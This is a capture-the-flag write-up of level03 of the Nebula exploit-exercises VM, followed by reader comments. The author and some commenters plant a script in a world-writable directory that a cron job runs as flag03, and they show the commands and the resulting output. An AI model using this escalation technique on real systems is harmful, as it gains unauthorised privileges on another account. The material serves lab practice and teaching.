level03
Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes.
cron is a utility used to run tasks periodically, found in nearly every distro.
In /home/flag03, we have a script – writable.sh – and a directory – writable.d.
level03@nebula:/home/flag03$ ls -sl
total 1
0 drwxrwxrwx 1 flag03 flag03 40 2014-06-03 03:39 writable.d
1 -rwxr-xr-x 1 flag03 flag03 98 2011-11-20 21:22 writable.sh
Let’s take a look at writable.sh:
#!/bin/sh
for i in /home/flag03/writable.d/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
done
This is fairly simple – for each file in the writable.d directory, execute the scripts contained within, and then delete them. bash -x runs the script in a trace mode, to give you a bit more detail about when it is running. I think we can ignore ulimit -t 5 – it just limits the CPU time available to the shell, possibly to stop a malicious script consuming excess resources.
Note that the writable.d directory is world read/write – so we can just put a script in there:
level03@nebula:~$ cat getflag.sh
#!/bin/sh
/bin/getflag >> /tmp/flag03.out
level03@nebula:~$ cp getflag.sh /home/flag03/writable.d/
Then wait a short while, assuming that the writable.sh script is the one being run by cron…
level03@nebula:/tmp$ ls -sl
total 4
4 -rw-rw-r-- 1 flag03 flag03 59 2014-06-04 09:39 flag03.out
level03@nebula:/tmp$ cat flag03.out
You have successfully executed getflag on a target account
Aside
Now – this is all well and good, but if we weren’t told that the script was run by cron, what could we do?
There is a root user in the Nebula VM, and using that I can do:
nebula@nebula:/var/spool/cron$ sudo crontab -u flag03 -l
*/3 * * * * /home/flag03/writable.sh
But I can’t do that as level03:
level03@nebula:/tmp$ crontab -u flag03 -l
must be privileged to use -u
Also, I could use ps to see that the process runs, but that would presume that I knew it was cron’ed anyway.
So, not sure how I would go about finding cron jobs as an unprivileged user.
I’ve asked on the Unix Stack Exchange.
lollipoponlips
October 16, 2016 at 9:18pmI’ve just started to do these exercises. I’m cofused:
1) what is the objective exactly?
Exploit exercises: Nebula – DweebsUnited
March 16, 2017 at 6:16pm[…] the cleanest, but it works to get the flag. I had the same thought as Cybergibbons though, (see this article) and from what I see of his findings, the only way to detect cronjobs if you don’t have […]
Shinko
May 6, 2017 at 12:47amFor fun, I decided to try and one-Liner it:
echo -e ‘#!/usr/bin/bashnn/bin/getflag>/home/flag03/got_result.txtn’>/home/flag03/writable.d/get_flag.sh;chmod +x /home/flag03/writable.d/get_flag.sh
emily
November 18, 2017 at 12:30amlevel03@nebula:~$ cat getfile.sh
level03@nebula:~$ cat: getflag.sh: No such file or directory
??
emily
November 18, 2017 at 12:32amlevel03@nebula:~$ cat getflag.sh
level03@nebula:~$ cat: getflag.sh: No such file or directory.
What am I doing wrong?
evan
December 27, 2017 at 5:23pmdid you create the getflag.sh script and is it located in your home directory?
manuelh
March 29, 2018 at 7:56pmTry the following:
level03@nebula:~$ cat > getflag.sh
#!/bin/sh
/bin/getflag >> /tmp/flag03.out
level03@nebula:~$ cp getflag.sh /home/flag03/writable.d/